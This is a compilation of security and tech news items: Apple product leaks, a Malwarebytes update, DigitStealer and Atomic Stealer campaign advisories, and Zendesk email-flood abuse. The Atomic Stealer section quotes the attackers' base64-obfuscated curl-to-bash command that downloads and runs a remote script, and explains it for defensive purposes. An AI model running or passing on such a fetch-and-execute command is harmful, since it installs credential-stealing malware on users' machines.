Apple doesn’t like to talk about its upcoming products before it’s ready, but sometimes the company’s software does the talking for it. So far this week we’ve had a couple of software-related leaks that have outed products Apple is currently testing—one a pre-release build of iOS 26, and the other some leaked files from a kernel debug kit (both via MacRumors).
Most of the new devices referenced in these leaks are straightforward updates to products that already exist: a new Apple TV, a HomePod mini 2, new AirTags and AirPods, an M4 iPad Air, a 12th-generation iPad to replace the current A16 version, next-generation iPhones (including the 17e, 18, and the rumored foldable model), a new Studio Display model, some new smart home products we’ve already heard about elsewhere, and M5 updates for the MacBook Air, Mac mini, Mac Studio, and the other MacBook Pros. There’s also yet another reference to the lower-cost MacBook that Apple is apparently planning to replace the M1 MacBook Air it still sells via Walmart for $599.
For power users, though, the most interesting revelation might be that Apple is working on a higher-end Apple Silicon iMac powered by an M5 Max chip. The kernel debug kit references an iMac with the internal identifier J833c, based on a platform identified as H17C—and H17C is apparently based on the M5 Max, rather than a lower-end M5 chip. (For those who don’t have Apple’s branding memorized, “Max” is associated with Apple’s second-fastest chips; the M5 Max would be faster than the M5 or M5 Pro, but slower than the rumored M5 Ultra.)
Say hello to the upgraded Malwarebytes for Mac—now with more robust protection, more control, and the same trusted defense you count on every day.
We’ve given our Mac scan engine a serious intelligence boost, so it thinks faster and digs deeper. The new enhanced scan searches across more of your system to hunt down even the most advanced threats, from stealthy infostealers to zero-hour malware, all while keeping the straightforward experience you love.
But that’s not all. We’ve also achieved a major performance boost, with up to 90% lower CPU usage for Malwarebytes for Mac.
What’s new
The upgrade comes with three new scan options designed to fit the way you work:
Quick scan: A speedy sweep of the usual suspects.
Threat scan: A full system check that is now your default.
Custom scan: Total control, letting you choose exactly what to scan, including folders and external drives.
It’s smarter protection that adapts to your needs.
What to expect
Your first enhanced scan may take a little longer. That’s because it’s covering more of your system than ever before to make sure nothing slips through the cracks. And with external drive scanning and WiFi security alerts, there is nowhere for viruses, infostealers, or spyware to linger.
After that, you’ll notice the difference. Scans will feel faster, lighter, and more intuitive.
In fact, the always-on, automated protection from Malwarebytes for Mac has always kept your Mac safe by monitoring every file you open, download, or save. Now, we have made it significantly more efficient. Our latest enhancements reduced CPU usage by up to 90%. What that means for you is a faster, snappier, and more responsive experience.
No action needed. Your protection just got better.
You don’t have to lift a finger; your protection simply levels up. Open Malwarebytes and explore the new scan options when you’re ready. Don’t see them yet? Make sure you’re on the latest version (5.19) under Profile → About Malwarebytes. If you aren’t, go to the Malwarebytes menu and select Check for updates.
Welcome to the next era of Mac security from Malwarebytes. More robust coverage, harnessing the same trusted protection you know, directly in your control.
A new infostealer called DigitStealer is going after Mac users. It avoids detection, skips older devices, and steals files, passwords, and browser data. We break down what it does and how to protect your Mac.
Researchers have described a new malware called DigitStealer that steals sensitive information from macOS users.
This variant comes with advanced detection-evasion techniques and a multi-stage attack chain. Most infostealers go after the same types of data and use similar methods to get it, but DigitStealer is different enough to warrant attention.
A few things make it stand out: platform-specific targeting, fileless operation, and anti-analysis techniques. Together, they pose relatively new challenges for Mac users.
The attack starts with a file disguised as a utility app called “DynamicLake,” which is hosted on a fake website rather than the legitimate company’s site. To trick users, it instructs you to drag a file into Terminal, which will initiate the download and installation of DigitStealer.
If your system matches certain regions or is a virtual machine, the malware won’t run. That’s likely to hinder analysis by researchers and to steer clear of infecting people in its home country, which is enough in some countries to stay out of prison. It also limits itself to devices with newer ARM features introduced with M2 chips or later. chips, skipping older Macs, Intel-based chips, and most virtual machines.
The attack chain is largely fileless so it won’t leave many traces behind on an affected machine. Unlike file-based attacks that execute the payload in the hard drive, fileless attacks execute the payload in Random Access Memory (RAM). Running malicious code directly in the memory instead of the hard drive has several advantages for attackers:
Evasion of traditional security measures: Fileless attacks bypass antivirus software and file-signature detection, making them harder to identify using conventional security tools.
Harder to remediate: Since fileless attacks don’t create files, they can be more challenging to remove once detected. This can make it extra tricky for forensics to trace an attack back to the source and restore the system to a secure state.
DigitStealer’s initial payload asks for your password and tries to steal documents, notes, and files. If successful, it uploads them to the attackers’ servers.
The second stage of the attack goes after browser information from Chrome, Brave, Edge, Firefox and others, as well as keychain passwords, crypto wallets, VPN configurations (specifically OpenVPN and Tunnelblick), and Telegram sessions.
How to protect your Mac
DigitStealer shows how Mac malware keeps evolving. It’s different from other infostealers, splitting its attack into stages, targeting new Mac hardware, and leaving barely any trace.
But you can still protect yourself:
Use an up-to-date real-time anti-malware solution. DigitStealer highlights the need for advanced behavioral protection, not just signature scans. Malwarebytes for Mac detects DigitStealer as MacOA.Stealer.DigitSteal.
Always be careful what you run in Terminal. Don’t follow instructions from unsolicited messages.
Be careful where you download apps from.
Keep your software, especially your operating system and your security defenses, up to date.
Cybercriminals are abusing a widespread lack of authentication in the customer service platform Zendesk to flood targeted email inboxes with menacing messages that come from hundreds of Zendesk corporate customers simultaneously.
Zendesk is an automated help desk service designed to make it simple for people to contact companies for customer support issues. Earlier this week, KrebsOnSecurity started receiving thousands of ticket creation notification messages through Zendesk in rapid succession, each bearing the name of different Zendesk customers, such as CapCom, CompTIA, Discord, GMAC, NordVPN, The Washington Post, and Tinder.
The abusive missives sent via Zendesk’s platform can include any subject line chosen by the abusers. In my case, the messages variously warned about a supposed law enforcement investigation involving KrebsOnSecurity.com, or else contained personal insults.
Moreover, the automated messages that are sent out from this type of abuse all come from customer domain names — not from Zendesk. In the example below, replying to any of the junk customer support responses from The Washington Post’s Zendesk installation shows the reply-to address is help@washpost.com.
One of dozens of messages sent to me this week by The Washington Post.
Notified about the mass abuse of their platform, Zendesk said the emails were ticket creation notifications from customer accounts that configured their Zendesk instance to allow anyone to submit support requests — including anonymous users.
“These types of support tickets can be part of a customer’s workflow, where a prior verification is not required to allow them to engage and make use of the Support capabilities,” said Carolyn Camoens, communications director at Zendesk. “Although we recommend our customers to permit only verified users to submit tickets, some Zendesk customers prefer to use an anonymous environment to allow for tickets to be created due to various business reasons.”
Camoens said requests that can be submitted in an anonymous manner can also make use of an email address of the submitter’s choice.
“However, this method can also be used for spam requests to be created on behalf of third party email addresses,” Camoens said. “If an account has enabled the auto-responder trigger based on ticket creation, then this allows for the ticket notification email to be sent from our customer’s accounts to these third parties. The notification will also include the Subject added by the creator of these tickets.”
Zendesk claims it uses rate limits to prevent a high volume of requests from being created at once, but those limits did not stop Zendesk customers from flooding my inbox with thousands of messages in just a few hours.
“We recognize that our systems were leveraged against you in a distributed, many-against-one manner,” Camoens said. “We are actively investigating additional preventive measures. We are also advising customers experiencing this type of activity to follow our general security best practices and configure an authenticated ticket creation workflow.”
In all of the cases above, the messaging abuse would not have been possible if Zendesk customers validated support request email addresses prior to sending responses. Failing to do so may make it easier for Zendesk clients to handle customer support requests, but it also allows ne’er-do-wells to sully the sender’s brand in service of disruptive and malicious email floods.
Fake versions of legitimate software are currently circulating on GitHub pages, in a large-scale campaign targeting Mac users.
Unfortunately, Malwarebytes for Mac is one of them.
Impersonating brands is sadly commonplace, as scammers take advantage of established brand names to target their victims. So this is nothing new, but we always want to warn you about it when we see it happening.
In this case, the cybercriminals’ goal is to distribute information stealers. They figured out a while ago that the easiest way to infect Macs is to get users to install the malware themselves, and the Atomic Stealer (aka AMOS) is the go-to information stealer for Macs.
The LastPass Threat Intelligence team has posted information about the campaign, which follows a similar pattern for all the impersonated software. Sometimes, the starting point is a sponsored Google ad (did we mention we don’t like them? Oh yes, we did!) that points to GitHub instead of the official page of the developer.
But in other, less obvious cases, you may see search results like these:
These only came up at the top of the search results when I explicitly searched for “Malwarebytes Github MacOS”, but the cybercriminals are known to have used Search Engine Optimization (SEO) techniques to get their listings higher in the search results.
The idea is to get the aspiring user to click on the “GET MALWAREBYTES” button on the dedicated GitHub page.
If someone does click that button, they will end up on a download page with instructions on how to install the fake product, which is actually an information stealer.
The terminal installation instructions for Malwarebytes for Mac pointed to a recently registered domain, but thankfully our Browser Guard blocked it anyway.
Here’s a technical breakdown of the instructions provided to the visitor:
/bin/bash -c "<something>" runs a command using the Bash shell on macOS or Linux. Bash is the interpreter for shell commands.
The part in quotes uses $( ... ). Everything inside this gets executed first; its output becomes part of the outer command.
$(echo aHR0cHM6Ly9nb3NyZWVzdHIuY29tL2h1bi9pbnN0YWxsLnNo | base64 -d) echo ... | base64 -d decodes the long string.
curl -fsSL is a command to download data from the web. The options mean:
-f: Fail silently for HTTP errors.-s: Silent mode (no progress bar).-S: Show errors if -s is used.
The outer command becomes: /bin/bash -c "$(curl -fsSL https://gosreestr[.]com/hun/install.sh)"
So, the complete command tells the system to download a script directly from an external server and immediately execute it using Bash.
This is dangerous for the user on many levels. Because there is no prompt or review, the user does not get a chance to see or assess what the downloaded script will do before it runs. It bypasses security because of the use of the command line, it can bypass normal file download protections and execute anything the attacker wants.
The files to download have already been taken down, but users that recognize this chain of infection are under advice to thoroughly check their machines for an infection.
Impersonated software besides Malwarebytes and LastPass included:
1Password
ActiveCampaign
After Effects
Audacity
Auphonic
Basecamp
BetterSnapTool
Biteable
Bitpanda
Bitsgap
Blog2Social
Blue Wallet
Bonkbot
Carbon Copy Cloner
Charles Schwab
Citibank
CMC Markets
Confluence
Coolors
DaVinci Resolve
DefiLlama
Desktop Clockology
Desygner
Docker
Dropbox
E-TRADE
EigenLayer
Fidelity
Fliki
Freqtrade Bot
Freshworks
Gemini
GMGN AI
Gunbot
Hemingway Editor
HeyGen
Hootsuite
HTX
Hypertracker
IRS
KeyBank
Lightstream
Loopback
Maestro Bot
Melon
Metatrader 5
Metricool
Mixpanel
Mp3tag
Mural
NFT Creator
NotchNook
Notion
Obsidian
Onlypult
Pendle Finance
Pepperstone
Pipedrive
Plus500
Privnote
ProWritingAid
Publer
Raycast
Reaper
RecurPost
Renderforest
Rippling
Riverside.fm
Robinhood
Rug AI
Sage Intacct
Salesloft
SentinelOne
Shippo
Shopify
SocialPilot
Soundtrap
StreamYard
SurferSEO
Thunderbird
TweetDeck
Uphold
Veeva CRM
Viraltag
VSCO
Vyond
Webull
Xai Games
XSplit
Zealy
Zencastr
Zenefits
Zotero
But it’s highly likely that there will be more, so don’t see this as an exhaustive list.
How to stay safe
Both ThreatDown and Malwarebytes for Mac detect and block this Atomic Stealer variant and many others, but it’s better to not download it at all. There are a few golden guidelines on how to stay safe:
Never run copy-pasted commands from random pages or forums even if they are on seemingly legitimate GitHub pages, and especially don’t use any that involve curl … | bash or similar combos.
Always download software from the official developer pages. If they do not host it themselves, verify the download links with them.
Avoid sponsored search results. At best they cost the company you looked for money and at worst you fall prey to imposters.
If you have scanned your Mac and found the information stealer:
Remove any suspicious login items, LaunchAgents, or LaunchDaemons from the Library folders to ensure the malware does not persist after reboot.
If any signs of persistent backdoor or unusual activity remain, strongly consider a full clean reinstall of macOS to ensure all malware components are eradicated. Only restore files from known clean backups. Do not reuse backups or Time Machine images that may be tainted by the infostealer.
After reinstalling, check for additional rogue extensions, crypto wallet apps, and system modifications.
Change all the passwords that were stored on the affected system and enable multi-factor authentication for your important accounts.
If all this sounds too difficult for you to do yourself, ask someone or a company you trust to help you—our support team are happy to assist you if you have any concerns.
We don’t just report on threats – we help safeguard your entire digital identity
Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.
Login
